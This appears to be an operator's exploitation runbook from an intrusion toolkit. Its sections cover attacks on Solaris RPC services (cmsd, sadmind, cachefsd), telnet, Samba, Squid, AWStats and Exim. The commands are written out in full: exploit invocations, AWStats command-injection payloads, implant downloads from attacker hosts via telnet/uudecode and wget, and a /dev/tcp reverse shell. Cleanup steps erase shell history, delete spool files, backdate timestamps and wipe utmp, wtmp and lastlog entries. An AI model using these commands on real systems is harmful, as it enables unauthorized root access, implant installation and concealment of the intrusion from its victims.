# possible core file in /? or /usr/lib/dmi/dmispd?
-ls /core /usr/lib/dmi/dmispd
#/var/adm/messages (for failures)
-tail /var/adm/messages
#########################################################
# EMPTYCRISS
#########################################################
### No redirection:
### This will create the output to paste into the telnet window:
### local unscripted window:
./emptycriss TARGET_IP
# or
perl ./emptycriss TARGET_IP
### op window
### paste instructions from 1st window into this one
### Ex.:
#ATTACKER# telnet
#
#ATTACKER# telnet> environ define TTYPROMPT abcdef
#
#ATTACKER# telnet> o victimip
#
#ATTACKER# telnet> root c c c c c c c c c c c c c c
#c c c c c c c c c c c c c c c c c c c c c c c c c c
#c c c c c c c c c c c c c c c c c c c c c c c c\n
##
##id
##uid=0(root) gid=1(other)
##uname -a
### if it fails, try again as /bin
ftshell telnet
### Redirected:
-tunnel
#
# In unscripted window
#
./emptycriss 127.0.0.1
# In scripted op window:
ftshell telnet
### NOTE: be sure to open 127.0.0.1 on the RANDOM redirected port
#Ex:
#o 127.0.0.1 RANDOM
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
~~p
noserver sendmail
ls -la
chmod 700 sendmail
PATH=. D="-l RAT_PORT" sendmail
##########################################
# EASYSTREET
##########################################
### cmsd 100068
### UDP is best since it's a single packet to exploit
-scan rpc TARGET_IP # look for 100068 and make note of port
### UDP is best since it's a single packet to exploit
### with -sploit:
#-sploit will ask you which exploit to try.
# Select 'CM' (calendar manager)
# Another window will pop up to run the exploit
# This window will pause to allow you to verify the command it will run.
# The command should look something like this (the ports will vary):
# -u 32778 -i 127.0.0.1 -l 192.168.250.3 -r sendmail -D /tmp/.scsi -n 26120
-c
# Append '-T 2' to the front of the line so that it looks like this:
# -T 2 -u 32778 -i 127.0.0.1 -l 192.168.250.3 -r sendmail -D /tmp/.scsi -n
26120 -c
# Then press return.
# The exploit window will prompt you to set up a listener like this:
# You must establish a NOPEN listener on 192.168.250.3:SOME_RANDOM_PORT
-nrtun RANDOM (as indicated in the -sploit exploit prompt)
#Press enter
#Now the exploit will occur and, after a couple of minutes, it will call back
#to your listener.
#Once the callback occurs, take the following steps:
#In a local window
LOCAL>closetunnel
#Press 'A' to abort the autodone commands
#Delete the files created by your exploit
#There should be one lock file and one callog file
-lt /var/spool/calendar
-rm /var/spool/calendar/THE_TWO_MOST_RECENT_FILES
#Use touch to set the directory timestamp back
-lt /var/spool
-touch /var/spool/SOME_OLDER_DIRECTORY /var/spool/calendar
### Usage:
./cmsex
./cmsex.auto
### get nopen ready

packrat noserver
### no redirection
./cmsex -i TARGET_IP -c 'mkdir /tmp/.scsi; cd /tmp/.scsi && telnet LOCAL_IP NETC
AT_PORT | uudecode && uncompress sendmail.Z && PATH=. sendmail' -T <target_type>
(-u RANDOM | -t RANDOM)
### Redirected:
-tunnel
u RANDOM TARGET_IP CMSD_PORT
r NETCAT_PORT
./cmsex -i 127.0.0.1 -c 'mkdir /tmp/.scsi; cd /tmp/.scsi && telnet PITCH_IP NETC

AT_PORT | uudecode && uncompress sendmail.Z && PATH=. s
endmail' -T 3 -u RANDOM
### when the upload is done, kill the netcat, then try connecting in
-nstun TARGET_IP
-rm sendmail
### Logging:
-lt /var/adm
-lt /var/spool/calendar
#########################################################
# EBB
#########################################################
### Sol2.10 vulnerable for only program 100230 metamhd using ebbshave.v4
### ./ebbshave.v5 is a wrapper program for ebbnew_linux exploit for Sparc Solari
s RPC services
### Important: ebbnew_linux must be in your PATH
command that is useful:
rpcinfo -n <PORT NUM> -u|-t <TARGET_IP> <PROGRAM NUM>
usage: ./ebbshave.v5 -o -v -t -p
-o : one of the following options [1-19]:
1, "5.9 metamhd", program # = 100230,
2, "5.8 ruserd", program # = 100002, NOTE = version 1
3, "5.8 ruserd", program # = 100002, NOTE = version 2 - must start servi
ce first by using rpcinfo -n before using this option
4, "5.8 ttdbserverd", program # = 100083,
5, "5.8 cachefsd", program # = 100235, NOTE = version 1 - Start with opt
ion #6 first, if it fails then try this option
6, "5.8 cachefsd", program # = 100235, NOTE = version 2 - must start ser
vice first by using rpcinfo -n before using this option
7, "5.8 metad", program # = 100229, NOTE = version 1
8, "5.8 metad", program # = 100229, NOTE = version 2 - must start servic
e first by using rpcinfo -n before using this option
9, "5.8 metamhd", program # = 100230,
10, "5.7 ruserd", program # = 100002, NOTE = must start service first by
using rpcinfo -n before using this option
11, "5.7 kcms_server", program # = 100221,
12, "5.7 cachefsd", program # = 100235,
14, "5,7 dr_daemon", program # = 300326,
15, "5.6 ruserd", program # = 100002,
16, "5.6 kcms_server", program # = 100221,
17, "5.6 cachefsd", program # = 100235, NOTE = version 1 - Start with op
tion #18 first, if it fails then try this option
18, "5.6 cachefsd", program # = 100235, NOTE = version 2 - must start se
rvice first by using rpcinfo -n before using this option
-v : the program version number you are exploiting which is obtained from rpcinf
o output
-t : targets ip address
-p : port number rpc program is listening on
example:
./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772
If you fail to exploit using ./ebbshave.v5, try bruteforcing using ebbshave.v4
### 1. Use the following command to look for a suitable program to hit
### Redirection:
-tunnel
l 111 TARGET_IP
### Local box:
./ebbshave.v5
ebbshave -p 127.0.0.1
### 2. Verify the portnum will work (should respond "ready and waiting)
### Use either:
# rpcinfo -n <PORT NUM> -u|-t <TARGET_IP> <PROGRAM NUM>
# Ex.: ebbshave -n 32776 -t targetip 100229
### Redirector:
-tunnel
l PORTNUM TARGET_IP
### Locally, see if the program you want is a viable option:
./ebbshave -n portnum -t host prognum
./ebbshave -n PORTNUM -t 127.0.0.1 PROGNUM
### Use this for usage statement
./ebbshave
###### 3. Plug in your choices and go:

### Netcat window:
packrat NETCAT_PORT
### Redirector:
-tunnel
l 111
l PORTNUM TARGET_IP
r NETCAT_PORT
### Locally:
#ebbshave -B -T OPTION -n PORTNUM -t 127.0.0.1 PROGNUM
ebbshave -n <PORT> -t 127.0.0.1 <PROGRAM> <VERSION>
# To throw it:
ebbshave -T <TARG_NUM> -n <PORT> -t 127.0.0.1 <PROGRAM> <VERSION>
### If that doesn't work, try without the best guess (B) option, or maybe increa
se th
### timeout period (W)
ebbshave -T OPTION -n PORTNUM -t 127.0.0.1 PROGNUM
### If successful, you should get a root shell

### Get the following ready for pasting: (paste one line at a time)
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
### pitch window
###### Cleanup:
/usr/openwin/bin/core
/var/adm/messages
Other cores locations?
Always look at utmp, wtmp,etc
####### If you've hit this before and know the addresses:

# Ex.: ./ebbshave -T 1 -S 0xffbefa20 -E 0xffbefa20 -n 32775 -t target 300326
#########################################################
# BS - BLUE
#########################################################
# ../bin/bs.tr -h
#
# Usage:
# [E=ratpreargs] [A=ratpostargs] bs.tr remoteIP remoteHost \
# [remoteDomain] \
# sadmindPort remoteDir remoteName localIP localPort
#
# ratpreargs : the string put on remote command line right after PATH=. a
nd
# before remoteName (e.g. E='C="-c LOCALIP port"' or
# E='C="-l listenport"')
#
# ratpostargs : the string put on remote command line after running remote
Name
#
#
# Command sent to bs will be munged from:
#
#CMD="mkdir -p ${REMOTE_DIR} && cd ${REMOTE_DIR} && telnet ${LOCAL_IP} ${LOCAL_P
ORT} < /
#dev/console | uudecode > /dev/null 2>&1 && uncompress -f ${REMOTE_FNAME}.Z && c
hmod 755
# ${REMOTE_FNAME} && PATH=.${RAT_PREARGS} ${REMOTE_FNAME}${RAT_POSTARGS}"
### TRICK - use -A option to get its archtype back
### TRICK - give a bad hostname to see if it's running in secure mode; if it com
plains, then
### it's still vulnerable, and work out the other options; if there'
s not response
### try another bad name; if still no response, then it's running in
secure mode and
### not vulnerable
### Scan target
#rpcinfo -p TARGET_IP
#
#rpcinfo -n BSPORT -u TARGET_IP 100232
#rpcinfo -n BSPORT -t TARGET_IP 100232
-scan rpc TARGET_IP
mx
:%s/SADMIND_PORT/SADMIND_PORT/g
:%s/REMOTE_DIR/\/tmp\/WORK_DIR/g
`x
###### Start netcat
packrat NETCAT_PORT
############# BS w/ NO REDIRECTION ###########

###### 1. No redirection:
### To use default port
# ./bs.tr TARGET-IP TARGET-NAME SADMIN-PORT REMOTE-DIR RAT-NAME LOCAL-IP NETCAT-
PORT
# ./bs.tr TARGET_IP TARGET_NAME SADMIN_PORT REMOTE_DIR RAT_NAME LOCAL_IP NETCAT_
PORT
### Try in this order:
bs.auto -i IP -u SADMIND_PORT TARGET_IP
bs.tr_TRY_SECOND remoteIP remoteHost [remoteDomain] sadmindPort remoteDir remote
Name localIP localPort
bs.tn.gr_USE_WHEN_bs.auto_AND_bs.tr_FAIL
### To give a port:

#E='D="-l RAT-PORT"' ./bs.tr TARGET-IP TARGET-NAME TARGET-DOMAIN SADMIND-PORT RE
MOTE-DIR RAT-NAME LOCAL-IP NETCAT-PORT
#E='D="-l RAT_PORT"' ./bs.tr TARGET_IP TARGET_NAME TARGET_DOMAIN SADMIND_PORT RE
MOTE_DIR RAT_NAME LOCAL_IP NETCAT_PORT
###### 3. Waiting:
# you will see bursty traffic on your tcpdump, first the trigger, then the conne
ction to upload nopen.
# Hit Ctrl-C on your nc
###### 4. COnnect to target:

### Direct connect:
cd ../down
noclient TARGET_IP:RAT_PORT
# or
### Callback - have this ready and waiting when running attack:
cd ../down
noclient -l RAT_PORT
############# BS w/ REDIRECTION ###########
###### 1. on redirector
-tunnel
u SADMIND_PORT TARGET_IP
r NETCAT_PORT
s
# and this if nopen needs to run in callback mode:

r RAT_PORT
###### 2. Local window
### Syntax (domainname is not always necessary):

CommandLine: ../bin/bs.tn.gr -h
New usage: ./bs.tn.gr [options] -- [options to <file2Xfer&Run>]
-i <remoteIP> (required)
-h <remoteHost> (required)
-a (does not work) Use alt rpcbind port
-s <sndPort> hardwired 111
-r <rcvPort> hardwired 111
-d <remoteDomain>
-p <sadmindPort> def= query rpcbind
-l <localIP> (required)
-n <localPort> (no default)
-f <file2Xfer&Run> (required)
-D <remoteDir> def= /tmp/...
-S <remoteScript> def= /tmp/....
-G grinch args deprecated
### Redirection:
### E='D="-l RAT-PORT"' ./bs.tr 127.0.0.1 TARGET-NAME TARGET-DOMAIN SADMIND-PORT
REMOTE-DIR RAT-NAME PITCH-IP NETCAT-PORT
### No domainname:
E='D="-l RAT-PORT"' ./bs.tr 127.0.0.1 TARGET_NAME SADMIND_PORT REMOTE_DIR RAT_NA
ME PITCH_IP NETCAT_PORT
### With domainname:
E='D="-l RAT_PORT"' ./bs.tr 127.0.0.1 TARGET_NAME TARGET_DOMAIN SADMIND_PORT REM
OTE_DIR RAT_NAME PITCH_IP NETCAT_PORT
### Callback:
E='D="-c PITCH_IP RAT_PORT"' ./bs.tr 127.0.0.1 TARGET_NAME SADMIND_PORT REMOTE_D
IR RAT_NAME PITCH_IP NETCAT_PORT
###### 3. Waiting:
# you will see bursty traffic on your tcpdump, first the trigger, then the conne
ction to upload nopen.
# Hit Ctrl-C on your nc
###### 4. From redirector:

# or
-nrtun RAT_PORT
-call PITCH_IP RAT_PORT
###### Cleanup:
# usually nothing
###########################################################
# GS - GREEN
###########################################################
gs.auto
Usage: $PROG -i <rem_ip> [ options ]
-i IP IP of target machine (NO DEFAULT)
-g opt Change default GS option from ./$GS_OPTION to \"./opt\"
(can be grins, frowns or sneer).
-C str Change default community string from public to \"str\".
-l IP IP of attack machine (Default: the first active IP found in
this order: ppp0, ppp1, eth0 or eth1)
-n # rat upload port (Default: a random port)
-p # Use port # for RAT listen/callback. (Default: random)
-s # Change delay used for -c to # seconds (must appear before -c).
-c Use NOPEN syntax to have RAT callback after a delay (Default
delay: $CALLBACKDELAY seconds). Callback is to -l IP.
-k Use ksh method instead of telnet/uu*code.
-z Do NOT use uncomrpess at the either end
-r rat name of rat on target (Default: sendmail)
-D dir directory to work from/create on target (Default = /tmp/.scsi)
-P Assume PATH=. will fail so use ./ratname
target, and MUST NOT use uuencode on upload.
-a ARCH String used to determine which architecture NOPEN server to
upload from /current/up/morerats/ using this (note tail -1):
\"ls -1 ./noserver* 2>/dev/null | grep -i ${ARCH} | tail -1\".
If not provided or no match, /current/up/noserver is assumed.
-G Retry exploit--using already uploaded RAT (useful when you need
to try adding -P option or try another RAT callback port).
### Or the old way:

# sneer(2.6) or frowns(2.7+)
gs.os.gr
Usage: /home/black/tmp/20030124-0318/./bin/gs.os.gr [options]
-i <remoteIP> (required)
-g <grins|frowns|sneer> def= frowns
-l <localIP> (required)
-n <localPort> (required)
-c <callbackPort> (no default)
-D <remoteDir> def= /tmp/.X11R6
-f <remoteRATName> def= nscd
-E <RATenvironment vars> (no default)
-A <RATarguments> (no default)
-S <remoteScript> DEPRECATED (and ignored)
-s <remoteScript> DEPRECATED (and ignored)
rpcinfo -p TARGET_IP
rpcinfo -n GSPORT -u TARGET_IP 100249
rpcinfo -n GSPORT -t TARGET_IP 100249
# From PI
-scan rpc TARGET_IP
-scan mibiisa TARGET_IP
# should respond w/ snmp version or h/w type if mibiisa is running:
-scan snmp1 TARGET_IP
# should give motd banner to tell you the OS
-scan snmp2 TARGET_IP
# If the above don't answer, GS won't work
#if the scans answer with "No such name" then they are probably not vulnerable
# anything else might be worth a shot as long as you're getting udp 161 to targe
t
### In netcat window:
packrat NETCAT_PORT
# Tunneling
# on redirector
-tunnel
u 161 TARGET_IP
r NETCAT_PORT
s
# logging depends on sneer(2.6) or frowns(2.7+)
# With redirector:
#./gs.os.gr -i 127.0.0.1 -g <frowns/sneer> -l PITCH-IP -n NETCAT-PORT -D /tmp/WO
RK-DIR -f RAT-NAME
./gs.os.gr -i 127.0.0.1 -g <frowns/sneer> -l PITCH_IP -n NETCAT_PORT -D /tmp/WOR
K_DIR -f RAT_NAME
# NO tunneling
# Local window
#./gs.os.gr -i TARGET-IP -g <frowns/sneer> -l LOCAL-IP -n NETCAT-PORT -D /tmp/WO
RK-DIR -f RAT-NAME
./gs.os.gr -i TARGET_IP -g <frowns/sneer> -l LOCAL_IP -n NETCAT_PORT -D /tmp/WOR
K_DIR -f RAT_NAME
# Both cases:
#you wait 4 minutes, and you should see the upload of nopen
# Ctrl-C your nc
### Connect to target:
### Straight connect (no redirection)
cd ../down
../bin/noclient TARGET_IP
### Connect using redirector:
-nstun TARGET_IP
### Cleanup:
### run cleaner after frowns (or else another callback in 4 minutes) (might be a
utomatic now)
### rm /tmp/mibiisa_ps_data
### toast utmp, wtmp, utmpx, wtmpx
###############################################
# YS - YELLOW
##############################################
### New way:
Usage: ys.auto -i TARGETIP [options]
-i IP IP of target machine (NO DEFAULT)
-l IP IP of attack machine (Default: the first active IP found in
this order: ppp0, ppp1, eth0 or eth1)
-n # rat upload port (Default: a random port)
-p # Use port # for RAT listen/callback. (Default: random)
-s # Change delay used for -c to # seconds (must appear before -c).
-c Use NOPEN syntax to have RAT callback after a delay (Default
delay: 3 seconds)
-z Do NOT use uncomrpess at the either end
-e Do NOT use "2>&1" on target. Fouls up in some shells.
-r rat name of rat on target (Default: sendmail)
-x # port to start mini X server on (Default: random port)
-D dir directory to work from/create on target (Default = /tmp/.scsi)
-P Assume PATH=. will fail so use ./ratname
target, and MUST NOT use uuencode on upload.
-a ARCH String used to determine which architecture NOPEN server to
upload from /current/up/morerats/ using this (note tail -1):
"ls -1 ./noserver* 2>/dev/null | grep -i ${ARCH} | tail -1".
If not provided or no match, /current/up/noserver is assumed.
NOTE: -x # and -p# can be the same, even in callback mode. ys.auto
provides
a mechanism to allow netcat callback to finish, and its -tunnel to
close before the NOPEN server calls back on the same port.
examples:
ys.auto -l 19.16.1.1 -i 10.0.3.1 -n 2222 -r nscd -x 9999 -D /tmp/.dir
ys.auto -i 10.0.3.1
ys.auto -i TARGET_IP -l REDIRECTOR_IP
NOTE: The only REQUIRED ARGUMENT is now -i
The best way to back out of ys.auto once done (whether or not you get on
target) is to kill off the packrat window first with ^C then ^D. Then
kill of the xc window the same way, finally kill the ys.auto.
ys.auto Version 1.4.1.1
### Old Way:
mx
:%s/XSERVER_PORT/x/g
x
-scan xwin TARGET_IP
### Locally:
packrat NETCAT_PORT
#or
packrat -n /current/bin/nc.YS NETCAT_PORT
######### YS With no redirection:
### Local Window 1:
#./wrap-sun.sh -l LOCAL-IP -r sendmail -p NETCAT-PORT -x XSERVER-PORT -d /tmp/WO
RK-DIR
./wrap-sun.sh -l LOCAL_IP -r sendmail -p NETCAT_PORT -x XSERVER_PORT -d /tmp/WOR
K_DIR
### Local Window 2:
#./xc -x LOCAL-IP -y XSERVER-PORT -s LOCAL-IP TARGET-IP
./xc -x LOCAL_IP -y XSERVER_PORT -s LOCAL_IP TARGET_IP
###### YS With REDIRECTION:

###### 1. On redirector - set up nopen tunnel
-tunnel
u 177 TARGET_IP
r XSERVER_PORT
r NETCAT_PORT
s
###### 2. Local window1

#./wrap-sun.sh -l 555.41.145.11 -r sendmail -p 24389 -x 39942 -d /tmp/.scsi
#./wrap-sun.sh -l PITCH-IP -r sendmail -p NETCAT-PORT -x XSERVER-PORT -d /tmp/WO
RK-DIR
./wrap-sun.sh -l PITCH_IP -r sendmail -p NETCAT_PORT -x XSERVER_PORT -d /tmp/WOR
K_DIR
# hit return
# type y and hit return
###### 3. Local Window2:

# for redirection local ip is redirector ip
#./xc -x PITCH-IP -y XSERVER-PORT -s PITCH-IP 127.0.0.1
#./xc -x 555.41.145.11 -y 39942 -s 555.41.145.11 127.0.0.1
./xc -x PITCH_IP -y XSERVER_PORT -s PITCH_IP 127.0.0.1
# hit return
# hit return
# hit return
# (At this point you should see a continue.... in your attack1 window
# in the attack1 window
# hit return
# hit return
# hit return
# (you should see your upload happen...)
### IF Exploit is successful
# DOING THE FOLLOWING WILL GREATLY REDUCE POSSIBLE LOGGING.
# ONLY HIT CONTINUE, IN THE MINI X SERVER WINDOW, ENOUGH
# TIMES TO GET THE RAT UPLOADED.
# WATCH TCPDUMP OUTPUT TO DETERMINE WHEN RAT IS UPLOADED.
# ONCE THE RAT IS UPLOADED, CONNECT
# TO THE TARGET VIA THE RAT AND DO THE FOLLOWING:
ps -ef | grep dtlogin
kill PID
# IF YOU SELECTED THE CORRECT dtlogin PID, THEN YOU SHOULD SEE A
# "connection closed" MESSAGE IN YOUR MINI X SERVER WINDOW. IF
# NOT, YOU SELECTED THE WRONG PID AND JUST KILLED SOMEBODY ELSE'S
# dtlogin. IF ALL GOES WELL, HIT control ^C IN THE MINI X SERVER
# WINDOW AND THE XC WINDOW.
# Ctrl-C your nc window

# Ctrl-C your xc window
###### Double window way:
### Local scripted (you'll type commands in this):

nc -l -p RPORT1
###Local scripted (your output from above will appear here):
nc -l -p RPORT2
### or instead, use doublet in a scripted window (type and output all in same wi
ndow):
doublet -O -t -i PITCH_IP RPORT1
### then set up the tunnels as below, and use wrap-telnet.sh and xc
### Scripted #1
wrap-telnet.sh -l REDIRECTIP -p RPORT1 -s RPORT2 -x XPORT
### Scripted #2
# xc -x REDIRECTIP -y XPORT -s REDIRECTIP 127.0.0.1
### Redir
# -tunnel
# u 177 TARGET_IP
# r XPORT
# r RPORT1
# r RPORT2
# r NETCAT_PORT
#w/o tunneling
cd ../down
../bin/noclient TARGET_IP
#w/ tunneling. In redirector window
-nstun TARGET_IP
-rm RAT_NAME
###### Cleaning up ######
### The error log file is configurable and so you must examine
### their xdm-config file to find out where errors are being
### logged.
###
### HAVE TO LOOK THROUGH "find" file from getscript
egrep -i '(xdm-config|errors|xerror)' /current/*find*m
### if no find available one of these will probably find it
-ls /tmp/*errors /var/dt/*errors
-cat error_file
-grep PITCH_IP /var/adm/SYSLOG /var/log/syslog /var/adm/messages
-ls -t /var/dt/
### you will notice Xerrors is the most recent
-tail /var/dt/Xerrors
### if your entries are the only ones there....
cat /dev/null >/var/dt/Xerrors
### if there are other entries you will do something like
wc -l /var/dt/Xerrors
### subtract the number of lines that are because of you from above
head -(what's left) > t ; cat t
### if it looks good:
cat t > /var/dt/Xerrors
-cat /var/dt/Xerrors
-rm t
-ls -t /var/adm
### anything that has a reasonably current timestamp you should check
### toasting the login entries.....
### Target window
-put ../up/toast t
### TO VIEW...
./t -u /var/adm/utmp
./t -u /var/adm/wtmp | tail -20
./t -x /var/adm/utmpx
./t -x /var/adm/wtmpx | tail -20
./t -l /var/adm/lastlog | tail
### TO ZAP...
./t -u /var/adm/utmp tty date
./t -u /var/adm/wtmp tty date
./t -x /var/adm/utmpx tty date
./t -x /var/adm/wtmpx tty date
./t -l /var/adm/lastlog /var/adm/wtmpx user
################################################
# CATFLAP
################################################
### on redirector
-stun TARGET_IP 23
# or
-tunnel
l 2323 TARGET_IP 23
r NETCAT_PORT
### Local window
# run catflap to generate output for pasting into telnet:
# syntax:
/current/bin/catflap_sparc -h
# Ex:
#/current/bin/catflap_sparc -7 -c "/bin/sh"
/current/bin/catflap_sparc -<option_num> -c "/bin/sh"
### on redirector
-rtun NETCAT_PORT
### Local window
ftshell telnet localhost 2323
### paste catflap output once you get telnet prompt
<ctrl><d>
### should get root prompt
### Now upload rat
### with ftshell:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
~~p
noserver sendmail
ls -la
chmod 700 sendmail
PATH=. D="-l RAT_PORT" sendmail
### now root on target (do the following if you did NOT use ftshell)
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
### pitch window
### <ctrl><c> or <ctrl><d> in root target window/nc once
### you have nopen on target
-put /current/up/toast t
-ls -t /var/adm /var/log
### look at entries
############################################
# EXPOSITTRAG
############################################
# exploit pcnfsd version 2.x (fails on v.1 or 3+)
#
# whatever redirector you use, port 514 cannot
# be in use
netstat -an | grep 514
# to determine the version
-scan rpc TARGET_IP
-tunnel
u UDP_PCNFSD_PORT TARGET_IP
# LOCAL
#./prout -w TARGET_IP UDP_PCNFSD_PORT
./prout -w 127.0.0.1 791
# pcnfsd version 1, version 3 and higher are not vulnerable

packrat PACKRAT_PORT
-tunnel
r PACKRAT_PORT
u PCNFSDPORT TARGET_IP
# An example of nopen.t: (note the size of the this file is 482. If you make
# modifications, change the size appropriately)
# use nopen.t file from build, if not <NULL>
# can be made with hexedit
<NULL>C0755 482 t
#!/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/local/etc:/usr/sbin:/usr/bin:/opt/SUNWs
pro/bin:/etc:/usr/ccs/bin:/usr/lib/nis:/
usr/sbin:/usr/bin
export PATH
mkdir /tmp/.scsi
cd /tmp/.scsi
telnet PITCH_IP PACKRAT_PORT < /dev/console |uudecode
uncompress -f sendmail.Z
chmod +x sendmail
#PATH=. D=-cPITCH_IP:NOPEN_PORT sendmail
PATH=. sendmail
/etc/init.d/pcnfs stop
/etc/init.d/pcnfs start
<NULL>
nc -vv -l -p 514 < nopen.t # edit nopen.t, note the size, subtract 14 from the a
ctual size and replace 482 with the new
size
-rtun 514 127.0.0.1
#./slugger2 TARGET_IP TARGET_PORT CMD [PRINTER_NAME]
./slugger2 TARGET_IP TARGET_PORT "cd ..
cd ..
cd ..
cd ..
cd tmp
rcp -p PITCH_IP:t .t
sh .t
"
# CLEANUP
/bin/rm /tmp/.t
# also might be /tmp/-p
/bin/rm -rf /tmp/.scsi
# /var/adm/messages will have pcnfs errors
# check history files
###################### ECHOWRECKER #####################
# samba server vulnerability
# Samba 3.0.2a-9AX and Samba 3.0.5 are currently vulnerable
# Samba 2.x on Redhat 7.3, 8.0, and 9.0 are vulnerable
-scan win_scan TARGET_IP
-tunnel
l 139 TARGET_IP
r RATPORT
./echowrecker_quiet -O -h -c [-s ] [-e ] [-a ] [-b] [-l] [-d ] [-i ]
General cases:
0 - Samba 3.0.2a-9AX [uses info leak]
1 - Samba 3.0.5 [uses info leak]
2 - Samba 2.2.7a (rh9 default) [uses info leak] (DO NOT USE)
Specific cases:
3 - Redflag 4.0 (kernel 2.4.20 samba 3.0.2a-9AX) (after restart of smb service)
4 - RedFlag 4.0 (kernel 2.4.20 samba 3.0.2a-9AX) (after reboot of server)
5 - RedFlag 4.0 AS SE (kernel 2.4.20 samba 2.2.8) (after restart of smb service)
6 - RedFlag 4.0 AS SE (kernel 2.4.20 samba 2.2.8) (after reboot of server)
7 - RedHat 7.3 (kernel 2.4.18-3 samba 2.2.3a)
8 - RedHat 8.0 (kernel 2.4.18-14 samba 2.2.5)
9 - RedHat 9.0 (samba 2.2.7)
10 - SuSE 9.0 (kernel 2.4.21 samba 2.2.8a)
-b = turn bruteforcing on
-l = just do info leak and print returned bytes - good for fingerprinting
-d = seconds of delay between brute force attempts
-s = start of address range to brute force for the location of the shellcode
-e = end of address range to brute force for the location of the shellcode
-a = address in GOT of function pointer to overwrite (usually 'free') [exactly,
not the addr-0xc]
to find it -> # objdump -R /usr/sbin/smbd | grep free
-s, -e, -i, -a should be input in hex (ie 0x1000)
-c = command to run on server as euid root
Ex: -c "/usr/bin/wget -O /tmp/a http://555.1.2.21/noserver && chmod 755 /tmp/a &
& /tmp/a"
=========================================================
Also, if the use of the "quiet" echowrecker edition is desired, usage is such:
$ make quiet
$ ./echowrecker_quiet -O 0 -h 127.0.0.1 -c "/usr/bin/wget -O /tmp/a http://PITCH
_IP:RATPORT/crond && chmod 755 /tmp/cron
d && /tmp/crond"
.
Found [20] to try
Trying [1 of 100]
Trying [2 of 100]
etc...
###################### ELECTRICSLIDE #####################
# Heap Overflow in squid 2.5.STABLE1-2 redhat 9.0
-tunnel
l 3128 TARGET_IP
-tunnel 9999 udp
./electricslide.pl -t <ip:port> -o <target_type> -d <delay> -l <ip:port>
[-U <user>] [-P <pass>] [-n <port>] [-f <ip:port>] [-a <local addr>]
-h, --help Print this helpful message
-t, --target Target Squid server ip
-o, --target-type Target type (see list below)
-l, --listen Electricslide listen port which Squid will connect t
o
-U, --proxy-user Proxy-Auth user name (if required)
-P, --proxy-pass Proxy-Auth password (if required)
-n, --nopen Set to port of UDP nopen tunnel
-f, --nopen_forward The address and port of the target machine to forwar
d
the attack to through the nopen tunnel
-a, --local-addr The local ip address (not 127.0.0.1)
-d, --delay Web server exploit transmit delay
(The web server will delay the last
400 bytes of the payload this number of seconds.
This ensures that the shellcode will be in proper
alignment when the exploit occurs. Default 30)
Examples:
# - Shooter with receiver on port 80:
#./electricslide.pl -t TARGET_IP:3128 -l LOCAL_IP:80 -d 30 -o 0
#
# - Shooter with receivers on port 80 using proxy auth:
#./electricslide.pl -t TARGET_IP:3128 -l LOCAL_IP:80 -d 30 -o 0 -U "user" -P "pa
ssword"
./electricslide.pl -t 127.0.0.1:7777 -l PITCH_IP:8888 -o 0 -n 9999 -f TARGET_IP:
3128
nc 127.0.0.1 9999
# or
eslide [options] <-t profile> <-l listenerip> <targetip>
--------------------------------------------------------------------------
Options:
-A <proxyuser:proxypass>
Proxy authentication info in username:password format
-l <listenip>
The ip address for the connect-back proxy request.
-p <targetport>
The target port. Default: 3128
-P <listenport>
The connectback port. Must be allowed by proxy. Default: 80
-t <profile>
The profile number. See supported profiles below
-k
Disable the firing of the killer profile which gets a fresh heap
(at your own risk!)
Profiles:
[0] Gentle Persuasion
[1] Redhat 9
./electricslide -t 1 -l LOCAL_IPorPITCH_IP TARGET_IPor127.0.0.1
###################### ELMIRASIGNET #####################
# vulnerability in awstats software < 6.3 on apache server
# jogswirl
-tunnel
l 80 TARGET_IP
r 5555
# vulnerable ?
# galeon http://127.0.0.1/cgi-bin/awstats.pl
Advanced Web Statistics 6.1 (build 1.704)
# ./xp_awstats.pl -i 127.0.0.1 -d /cgi-bin/awstats.pl -e 0 -c "uname -a;ls
-la;w"
./xp_awstats.pl -i<host> -d<dir/file> -e<exploit method number> -c<commands to r
un on target>
-i <127.0.0.1>
-d </cgi-bin/awstats.pl>
-p <port>
-e <exploit method>
0: ?pluginmode=:system("CMD");
1: ?configdir=|CMD|
2: ?update=1&logfile=|CMD|&framename=mainright
-c <Command to run on target>
Examples:
1) ./xp_awstats.pl -i http://127.0.0.1/cgi-bin/awstats.pl -e3 -c"uname -a;ls -la
;w"
2) ./xp_awstats.pl -i http://127.0.0.1/cgi-bin/awstats.pl -e3 -c"(mkdir /tmp/.sc
si; cd /tmp/.scsi; /usr/bin/wget http://
PITCH_IP:5555/sendmail -Osendmail;chmod +x sendmail;D=-cPITCH_IP:9999 PATH=. sen
dmail) 2>/dev/null"
###################### ERRGENTLE ##########################
# exploits vulnerability Exim 3.22 thru Exim 3.35 Mail Transfer Agent
# brute force
###### Version 3
# Upload on PITCHIMPAIR and run
netstat -an | grep LISTEN | grep 113
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/bin/xp-exim-3-remote-solaris-v3 x
-shell
./x -i TARGET_IP -p 25 -d SCAPEGOAT_DOMAIN -u nobody -t
# states if vulnerable; hit return to throw if vulnerable
# takes about 1000 hits; scrolls fast; will get root prompt
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
id
pwd
# will put you in /usr/exim-3.33/spool
PATH=. crond
<ctrl><d>
exit
-rm /tmp/.scsi/x /tmp/.scsi
# check /var/log/messages for audit message or PAM failed attempt,
###### Version 2
-tunnel
l 25 TARGET_IP
r 113
r RANDOM_PORT
# test susceptability:
./xp-exim-3-v3 -i 555.1.2.150 -p 25 -t -d a.jetson.net -u nobody
./xp-exim-3 -i 127.0.0.1 -p 25 -c "sh </dev/tcp/PITCH_IP/RANDOM_PORT >&0 2>&0" -
t
# response should be something like:
# It's vulnerable! Hit a key to start
# change location of heap to point to other location using -l:

./xp-exim-3 -i 127.0.0.1 -p 25 -t -l2 -c "sh </dev/tcp/PITCH_IP/RANDOM_PORT >&0
2>&0"
# or
